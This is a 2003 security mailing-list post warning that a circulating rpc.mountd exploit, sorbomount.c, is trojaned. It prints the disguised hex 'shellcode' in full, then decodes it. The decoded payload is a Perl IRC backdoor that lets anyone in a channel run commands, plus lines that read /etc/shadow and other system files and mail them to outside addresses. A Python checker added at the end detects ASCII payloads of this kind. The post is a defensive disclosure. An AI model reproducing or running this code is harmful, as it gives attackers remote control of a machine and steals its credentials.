sorbomount.c off-by-one rpc.mountd exploit trojaned

From: DownBload (downbload_at_hotmail.com)
Date: 09/21/03

    Date: 21 Sep 2003 10:09:47 -0000
    To: vuln-dev@securityfocus.com

    KIDDIES ALERT!!! -> SORBOMOUNT.C EXPLOIT TROJANED!!! <- KIDDIES ALERT!!!

    - If this is already well known (and it should be), just > /dev/null it.

    There is a sorbomount.c exploit for an off-by-one bug in rpc.mountd in the wild.
    The version that I got from my friend is trojaned!

    Even the dumbest asm coder in the world can't write such a big port bind shellcode :-))).
    It must be something else...

    sorbomount.c:

    char shellcode[] =
    /* port bind tcp/30464 ***/
       "\x65\x63\x68\x6f\x20\x27\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70"
      "\x65\x72\x6c\x27\x20\x3e\x3e\x20\x61\x2e\x70\x6c\x20\x3b\x20\x65\x63\x68"
      "\x6f\x20\x27\x24\x63\x68\x61\x6e\x3d\x22\x23\x6c\x61\x6d\x65\x6d\x61\x74"
      "\x65\x22\x3b\x27\x20\x3e\x3e\x20\x61\x2e\x70\x6c\x20\x3b\x65\x63\x68\x6f"
      "\x20\x27\x24\x6e\x69\x63\x6b\x3d\x22\x6c\x61\x6d\x65\x6d\x61\x74\x65\x22"
      "\x3b\x27\x20\x3e\x3e\x20\x61\x2e\x70\x6c\x20\x3b\x65\x63\x68\x6f\x20\x27"
      "\x24\x73\x65\x72\x76\x65\x72\x3d\x22\x69\x72\x63\x2e\x64\x61\x78\x6e\x65"
      "\x74\x2e\x6e\x6f\x22\x3b\x27\x20\x3e\x3e\x20\x61\x2e\x70\x6c\x20\x3b\x65"
      "\x63\x68\x6f\x20\x27\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d\x3d\x7b\x7d"
      "\x3b\x65\x78\x69\x74\x20\x69\x66\x20\x66\x6f\x72\x6b\x3b\x75\x73\x65\x20"
      "\x49\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3b\x24\x73\x6f\x63\x6b\x20\x3d"
      "\x20\x49\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3a\x3a\x49\x4e\x45\x54\x2d"
      "\x3e\x6e\x65\x77\x28\x24\x73\x65\x72\x76\x65\x72\x2e\x22\x3a\x36\x36\x36"
      "\x37\x22\x29\x7c\x7c\x65\x78\x69\x74\x3b\x70\x72\x69\x6e\x74\x20\x24\x73"
      "\x6f\x63\x6b\x20\x22\x55\x53\x45\x52\x20\x6c\x61\x6d\x65\x6d\x61\x74\x65"
      "\x20\x2b\x69\x20\x6c\x61\x6d\x65\x6d\x61\x74\x65\x20\x3a\x6c\x61\x6d\x65"
      "\x6d\x61\x74\x65\x72\x76\x32\x5c\x6e\x4e\x49\x43\x4b\x20\x6c\x61\x6d\x65"
      "\x6d\x61\x74\x65\x5c\x6e\x22\x3b\x24\x69\x3d\x31\x3b\x77\x68\x69\x6c\x65"
      "\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x3d\x7e\x2f\x5e\x5b\x5e\x20\x5d\x2b\x20"
      "\x28\x5b\x5e\x20\x5d\x2b\x29\x20\x2f\x29\x7b\x24\x6d\x6f\x64\x65\x3d\x24"
      "\x31\x3b\x6c\x61\x73\x74\x20\x69\x66\x20\x24\x6d\x6f\x64\x65\x3d\x3d\x22"
      "\x30\x30\x31\x22\x3b\x69\x66\x28\x24\x6d\x6f\x64\x65\x3d\x3d\x22\x34\x33"
      "\x33\x22\x29\x7b\x24\x69\x2b\x2b\x3b\x24\x6e\x69\x63\x6b\x3d\x7e\x73\x2f"
      "\x5c\x64\x2a\x24\x2f\x24\x69\x2f\x3b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f"
      "\x63\x6b\x20\x22\x4e\x49\x43\x4b\x20\x24\x6e\x69\x63\x6b\x5c\x6e\x22\x3b"
      "\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x4a\x4f\x49"
      "\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x50\x52\x49\x56\x4d\x53\x47\x20\x24"
      "\x63\x68\x61\x6e\x20\x3a\x6c\x61\x6d\x65\x6d\x61\x74\x65\x20\x76\x32\x2e"
      "\x31\x5c\x6e\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a"
      "\x74\x6f\x20\x72\x75\x6e\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x73\x2c\x20\x74"
      "\x79\x70\x65\x3a\x20\x22\x2e\x24\x6e\x69\x63\x6b\x2e\x22\x3a\x20\x63\x6f"
      "\x6d\x6d\x61\x6e\x64\x5c\x6e\x22\x3b\x77\x68\x69\x6c\x65\x28\x3c\x24\x73"
      "\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f\x5e\x50\x49\x4e\x47\x20\x28"
      "\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b"
      "\x20\x22\x50\x4f\x4e\x47\x20\x24\x31\x5c\x6e\x4a\x4f\x49\x4e\x20\x24\x63"
      "\x68\x61\x6e\x5c\x6e\x22\x3b\x7d\x69\x66\x28\x73\x2f\x5e\x5b\x5e\x20\x5d"
      "\x2b\x20\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x24"
      "\x6e\x69\x63\x6b\x5b\x5e\x20\x3a\x5c\x77\x5d\x2a\x3a\x5b\x5e\x20\x3a\x5c"
      "\x77\x5d\x2a\x20\x28\x2e\x2a\x29\x24\x2f\x24\x31\x2f\x29\x7b\x73\x2f\x5c"
      "\x73\x2a\x24\x2f\x2f\x3b\x24\x5f\x3d\x60\x24\x5f\x60\x3b\x66\x6f\x72\x65"
      "\x61\x63\x68\x28\x73\x70\x6c\x69\x74\x20\x22\x5c\x6e\x22\x29\x7b\x70\x72"
      "\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x50\x52\x49\x56\x4d\x53\x47"
      "\x20\x24\x63\x68\x61\x6e\x20\x3a\x24\x5f\x5c\x6e\x22\x3b\x73\x6c\x65\x65"
      "\x70\x20\x31\x3b\x7d\x7d\x7d\x23\x63\x68\x6d\x6f\x64\x20\x2b\x78\x20\x2f"
      "\x74\x6d\x70\x2f\x6c\x6f\x6c\x20\x32\x3e\x2f\x64\x65\x76\x2f\x6e\x75\x6c"
      "\x6c\x3b\x2f\x74\x6d\x70\x2f\x6c\x6f\x6c\x27\x20\x3e\x3e\x20\x61\x2e\x70"
      "\x6c\x20\x3b\x70\x65\x72\x6c\x20\x61\x2e\x70\x6c\x3b\x20\x63\x61\x74\x20"
      "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20\x3e\x3e\x20\x6f\x77\x6e"
      "\x2e\x74\x78\x74\x3b\x20\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x73\x68\x61"
      "\x64\x6f\x77\x20\x3e\x3e\x20\x6f\x77\x6e\x2e\x74\x78\x74\x20\x3b\x20\x63"
      "\x61\x74\x20\x2f\x65\x74\x63\x2f\x68\x6f\x73\x74\x73\x20\x3e\x3e\x20\x6f"
      "\x77\x6e\x2e\x74\x78\x74\x3b\x20\x75\x6e\x61\x6d\x65\x20\x2d\x61\x20\x3e"
      "\x3e\x20\x6f\x77\x6e\x2e\x74\x78\x74\x3b\x20\x69\x66\x63\x6f\x6e\x66\x69"
      "\x67\x20\x3e\x3e\x20\x6f\x77\x6e\x2e\x74\x78\x74\x3b\x20\x63\x61\x74\x20"
      "\x6f\x77\x6e\x2e\x74\x78\x74\x20\x7c\x20\x6d\x61\x69\x6c\x20\x65\x61\x72"
      "\x69\x61\x73\x40\x68\x75\x73\x68\x2e\x63\x6f\x6d\x20\x3b\x20\x63\x61\x74"
      "\x20\x6f\x77\x6e\x2e\x74\x78\x74\x20\x7c\x20\x6d\x61\x69\x6c\x20\x53\x6f"
      "\x6e\x69\x63\x6f\x36\x30\x40\x68\x6f\x74\x6d\x61\x69\x6c\x2e\x63\x6f\x6d"
      "\x20\x3b\x72\x6d\x20\x2d\x72\x66\x20\x6f\x77\x6e\x2e\x74\x78\x74\x3b\x72"
      "\x6d\x20\x2d\x72\x66\x20\x61\x2e\x70\x6c\x3b";

    Damn, this looks nasty!!!
    ...
    system(shellcode);
    ...

    So, this is not real shellcode, these are just hexadecimal values of ASCII characters.
    That "shellcode" will do this on your machine (or maybe already did:-))) :
    ---------------------------------------------------------------------------
    echo '#!/usr/bin/perl' >> a.pl ;
    echo '$chan="#lamemate";' >> a.pl ;
    echo '$nick="lamemate";' >> a.pl ;
    echo '$server="irc.daxnet.no";' >> a.pl ;
    echo '$SIG{TERM}={};
    exit if fork;
    use IO::Socket;$sock = IO::Socket::INET->new($server.":6667") || exit;
    print $sock "USER lamemate +i lamemate :lamematerv2\nNICK lamemate\n";
    $i=1;while(<$sock>=~/^[^ ]+ ([^ ]+) /) {
    $mode=$1;
    last if $mode=="001";
    if($mode=="433") {
    $i++;
    $nick=~s/\d*$/$i/;
    print $sock "NICK $nick\n";
    }
    }
    print $sock "JOIN $chan\nPRIVMSG $chan :lamemate v2.1\nPRIVMSG $chan :to run commands, type: ".$nick.": command\n";
    while(<$sock>)
    {
    if (/^PING (.*)$/)
    {
    print $sock "PONG $1\nJOIN $chan\n";
    }
    if(s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/) {
    s/\s*$//;
    $_=`$_`;
    foreach(split "\n")
    {
    print $sock "PRIVMSG $chan :$_\n";
    sleep 1;
    }
    }
    }
    #chmod +x /tmp/lol 2>/dev/null;/tmp/lol' >> a.pl ;
    perl a.pl;
    cat /etc/passwd >> own.txt;
    cat /etc/shadow >> own.txt ;
    cat /etc/hosts >> own.txt;
    uname -a >> own.txt;
    ifconfig >> own.txt;
    cat own.txt | mail earias@hush.com ;
    cat own.txt | mail Sonico60@hotmail.com ;
    rm -rf own.txt;rm -rf a.pl;
    ---------------------------------------------------------------------------

    So....
    An a.pl perl script is created.
    This perl script will connect to the irc server irc.daxnet.no as user lamemate, and will send a private message to the channel #lamemate. Now anyone can run commands on your machine.
    After that, passwd, shadow and hosts are cat-ed to own.txt; uname and ifconfig output are also redirected to own.txt.
    own.txt is mailed to earias@hush.com and Sonico60@hotmail.com.
    own.txt and a.pl are rm-ed.

    I wonder how many shadow files earias and Sonico60 have :-).
    Poor kiddies :-PPppp.

    ------------------------------------
    DownBload / Illegal Instruction Labs
    Security Research & Education
    http://www.ii-labs.org
    e-mail:downbload[at]hotmail.com

    "Born under the lucky star magical,
     but on this earth generally tragical."
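An added example, not part of the original post or of sorbomount.c: a small Python checker that does what the post does by hand, decoding a `"\xNN"` C initializer back to bytes and scoring how much of it is printable ASCII, which is the tell that a "shellcode" array is really a command string handed to system(). Both sample arrays below are constructed for the example.

```python
import re
import string

# Constructed sample shaped like the trojaned array: a C char[] initializer of
# "\xNN" escapes continued over several adjacent string literals.
SAMPLE_SHELLCODE_C = r'''
char shellcode[] =
/* port bind tcp/30464 ***/
   "\x65\x63\x68\x6f\x20\x27\x68\x69\x27\x20\x3e\x3e\x20\x61\x2e\x70\x6c"
  "\x20\x3b\x20\x70\x65\x72\x6c\x20\x61\x2e\x70\x6c";
'''

# Constructed sample of genuine machine code (nop, nop, int3, ret, ...) for contrast.
SAMPLE_MACHINE_CODE_C = r'char code[] = "\x90\x90\xcc\xc3\x00\xff";'

_STRING_LITERAL = re.compile(r'"((?:\\.|[^"\\])*)"')
_ESCAPE = re.compile(r'\\x([0-9a-fA-F]{1,2})|\\(.)')
_SIMPLE_ESCAPES = {'n': b'\n', 't': b'\t', 'r': b'\r', '0': b'\0',
                   '\\': b'\\', '"': b'"', "'": b"'"}
_PRINTABLE = set(string.printable.encode('ascii'))


def decode_c_bytes(src: str) -> bytes:
    """Concatenate every adjacent string literal in a C initializer and resolve
    \\xNN and the common backslash escapes into the raw bytes the compiler would emit."""
    out = bytearray()
    for lit in _STRING_LITERAL.findall(src):
        pos = 0
        for m in _ESCAPE.finditer(lit):
            out += lit[pos:m.start()].encode('latin-1')
            if m.group(1) is not None:
                out.append(int(m.group(1), 16))
            else:
                out += _SIMPLE_ESCAPES.get(m.group(2), m.group(2).encode('latin-1'))
            pos = m.end()
        out += lit[pos:].encode('latin-1')
    return bytes(out)


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII; real shellcode scores low."""
    return sum(b in _PRINTABLE for b in data) / len(data) if data else 0.0


def classify(src: str, threshold: float = 0.95):
    """Return (verdict, ratio, decoded text) for a C byte-array initializer."""
    data = decode_c_bytes(src)
    ratio = printable_ratio(data)
    verdict = 'ascii command string' if ratio >= threshold else 'binary code'
    return verdict, ratio, data.decode('latin-1')


if __name__ == '__main__':
    for name, src in (('shellcode', SAMPLE_SHELLCODE_C), ('code', SAMPLE_MACHINE_CODE_C)):
        verdict, ratio, text = classify(src)
        print(f'{name}: {verdict} ({ratio:.0%} printable) -> {text!r}')
```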


